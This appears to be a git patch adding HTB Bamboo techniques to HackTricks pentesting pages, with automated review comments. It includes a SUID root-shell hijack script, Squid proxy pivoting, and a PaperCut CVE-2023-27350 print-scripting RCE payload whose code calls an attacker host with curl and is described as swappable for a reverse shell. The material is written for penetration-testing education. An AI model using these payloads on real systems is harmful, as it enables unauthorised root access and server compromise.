From 8169c4137b9a84f3be44d1309ef510defff4c14e Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Tue, 3 Feb 2026 13:01:30 +0000 Subject: [PATCH] Add content from: HTB: Bamboo --- .../privilege-escalation/write-to-root.md | 32 +++++++++++++++++++ .../3128-pentesting-squid.md | 30 ++++++++++++++++- src/pentesting-web/command-injection.md | 18 ++++++++++- 3 files changed, 78 insertions(+), 2 deletions(-) diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md index f88fa99d382..c4c06fb42a2 100644 --- a/src/linux-hardening/privilege-escalation/write-to-root.md +++ b/src/linux-hardening/privilege-escalation/write-to-root.md 
@@ -60,6 +60,38 @@ Name=Evil Desktop Entry For more info check [**this post**](https://chatgpt.com/c/67fac01f-0214-8006-9db3-19c40e45ee49) where it was used to exploit a real vulnerability. +### Root executing user-writable scripts/binaries + +If a privileged workflow runs something like `/bin/sh /home/username/.../script` (or any binary inside a directory owned by an unprivileged user), you can hijack it: + +- **Detect the execution:** monitor processes with [pspy](https://github.com/DominicBreuker/pspy) to catch root invoking user-controlled paths: + +```bash +wget http://attacker/pspy64 -O /dev/shm/pspy64 +chmod +x /dev/shm/pspy64 +/dev/shm/pspy64 # wait for root commands pointing to your writable path +``` + +- **Confirm writeability:** ensure both the target file and its directory are owned/writable by your user. +- **Hijack the target:** backup the original binary/script and drop a payload that creates a SUID shell (or any other root action), then restore permissions: + +```bash +mv server-command server-command.bk +cat > server-command <<'EOF' +#!/bin/bash +cp /bin/bash /tmp/rootshell +chown root:root /tmp/rootshell +chmod 6777 /tmp/rootshell +EOF +chmod +x server-command +``` + +- **Trigger the privileged action** (e.g., pressing a UI button that spawns the helper). When root re-executes the hijacked path, grab the escalated shell with `./rootshell -p`. + +## References + +- [HTB Bamboo – hijacking a root-executed script in a user-writable PaperCut directory](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md index 76c46637cb6..82109a0059a 100644 --- a/src/network-services-pentesting/3128-pentesting-squid.md +++ b/src/network-services-pentesting/3128-pentesting-squid.md 
@@ -42,7 +42,35 @@ Alternatively, the Squid Pivoting Open Port Scanner ([spose.py](https://github.c python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 ``` -{{#include ../banners/hacktricks-training.md}} +### Pivot & tooling configuration + +*Use Squid as a discovery pivot and a transparent upstream hop for CLI and browser tools.* + +- **Scan “from” the proxy:** run SPOSE through Squid to enumerate ports reachable from the proxy host/loopback. With [uv](https://github.com/astral-sh/uv) you can install deps and scan all TCP ports directly: + +```bash +uv add --script spose.py -r requirements.txt +uv run spose.py --proxy http://SQUID_IP:3128 --target localhost --allports +``` +- **Proxychains for HTTP interaction:** append a strict HTTP entry at the bottom of `/etc/proxychains.conf`: + +```ini +[ProxyList] +http SQUID_IP 3128 +``` +Then interact with internal listeners (e.g., a web UI bound to 127.0.0.1) transparently through Squid: +```bash +proxychains curl http://127.0.0.1:9191 -v +``` + +- **Chaining Burp/Browser → Squid:** configure Burp *Proxy → Settings → Network → Connections → Upstream proxy servers* to point to `http://SQUID_IP:3128`. Requests to internal hosts such as `http://127.0.0.1:9191` will traverse Browser → Burp → Squid → target, enabling full interception of services otherwise not reachable externally. + +## References + +- [SPOSE – Squid Pivoting Open Port Scanner](https://github.com/aancw/spose) +- [HTB Bamboo walkthrough (Squid pivoting example)](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) + +{{#include ../banners/hacktricks-training.md}} diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index dc2b2c0b8ee..fab61eb2a4d 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -206,6 +206,21 @@ Example payloads: Because these diagnostics are parsed by the JVM itself, no shell metacharacters are required and the command runs with the same integrity level as the launcher. Desktop IPC bugs that forward user-supplied JVM flags (see [Localhost WebSocket abuse](websocket-attacks.md#localhost-websocket-abuse--browser-port-discovery)) therefore translate directly into OS command execution. +## PaperCut NG/MF SetupCompleted auth bypass -> print scripting RCE + +- Vulnerable NG/MF builds (e.g., 22.0.5 Build 63914) expose `/app?service=page/SetupCompleted`; browsing there and clicking **Login** returns a valid `JSESSIONID` without credentials (authentication bypass in the setup flow). +- In **Options → Config Editor**, set `print-and-device.script.enabled=Y` and `print.script.sandboxed=N` to turn on printer scripting and disable the sandbox. +- In the printer **Scripting** tab, enable the script and keep `printJobHook` defined to avoid validation errors, but place the payload **outside** the function so it executes immediately when you click **Apply** (no print job needed): + +```js +function printJobHook(inputs, actions) {} +cmd = ["bash","-c","curl http://attacker/hit"]; +java.lang.Runtime.getRuntime().exec(cmd); +``` + +- Swap the callback for a reverse shell; if the UI/PoC cannot handle pipes/redirects, stage a payload with one command and exec it with a second request. +- Horizon3's [CVE-2023-27350.py](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) automates the auth bypass, config flips, command execution, and rollback—run it through an upstream proxy (e.g., `proxychains` → Squid) when the service is only reachable internally. + ## Brute-Force Detection List 
@@ -216,7 +231,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject ## References -- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection) - [https://portswigger.net/web-security/os-command-injection](https://portswigger.net/web-security/os-command-injection) - [Extraction of Synology encrypted archives – Synacktiv 2025](https://www.synacktiv.com/publications/extraction-des-archives-chiffrees-synology-pwn2own-irlande-2024.html) @@ -224,5 +238,7 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [HTB Nocturnal: IDOR → Command Injection → Root via ISPConfig (CVE‑2023‑46818)](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html) - [Unit 42 – TOTOLINK X6000R: Three New Vulnerabilities Uncovered](https://unit42.paloaltonetworks.com/totolink-x6000r-vulnerabilities/) - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/) +- [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) +- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) {{#include ../banners/hacktricks-training.md}}
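Review bot: in the write-to-root.md hunk, the closing bullet tells the reader to run `./rootshell -p`, but the payload shown writes the shell to `/tmp/rootshell`, so that command only works when the cwd happens to be /tmp; make it `/tmp/rootshell -p` to match the script. The hijack steps also jump from the generic `/home/username/.../script` to a bare `server-command` without saying what that file is; a short clause naming it as the PaperCut helper from the linked Bamboo writeup (the only place the product is mentioned) would make the steps followable. Separately, the unchanged context line just above the hunk links "this post" to a chatgpt.com conversation URL, which is not a resolvable public reference and should point at the actual writeup.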
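Review bot: the proxychains example in the 3128-pentesting-squid.md hunk needs a prerequisite before `proxychains curl http://127.0.0.1:9191 -v`: if the config has an active `localnet 127.0.0.0/255.0.0.0` line (Kali's default `/etc/proxychains4.conf` ships with it enabled), loopback destinations are excluded from proxying and the curl reaches the tester's own machine instead of traversing Squid, with no error to hint at it; tell readers to comment that line out, and note that proxychains-ng reads `/etc/proxychains4.conf` rather than the `/etc/proxychains.conf` named in the text. The phrase "append a strict HTTP entry" also conflates the `strict_chain` mode setting with the `[ProxyList]` line; say which is meant. Minor: the "Scan from the proxy" bullet repeats the spose.py invocation already present in the unchanged context directly above it; the `uv` lines are the only new information.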
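Review bot: the PaperCut section in the command-injection.md hunk (`@@ -206`) describes an authentication bypass followed by use of the product's own print-scripting feature calling `java.lang.Runtime.getRuntime().exec`, not injection into an OS command, so it reads out of place between the JVM-flag material and the brute-force wordlist; a dedicated PaperCut page with a one-line cross-link from here would fit the site layout better. Wherever it lives, the heading or first bullet should name CVE-2023-27350, which currently appears only inside the PoC filename, and state the fixed build next to the example vulnerable build `22.0.5 Build 63914`, since readers use this page to judge exposure. The first bullet also says Login returns a valid `JSESSIONID` without credentials but not which account that session belongs to, which matters for the Config Editor step that follows.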
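Review bot: in the references hunk (`@@ -216`), the newly added entry titles the 0xdf URL by the technique ("PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE") while the same URL is listed in the other two touched files as "HTB Bamboo"; use one consistent title so the three pages visibly cite the same writeup. Dropping the duplicated PayloadsAllTheThings line is correct.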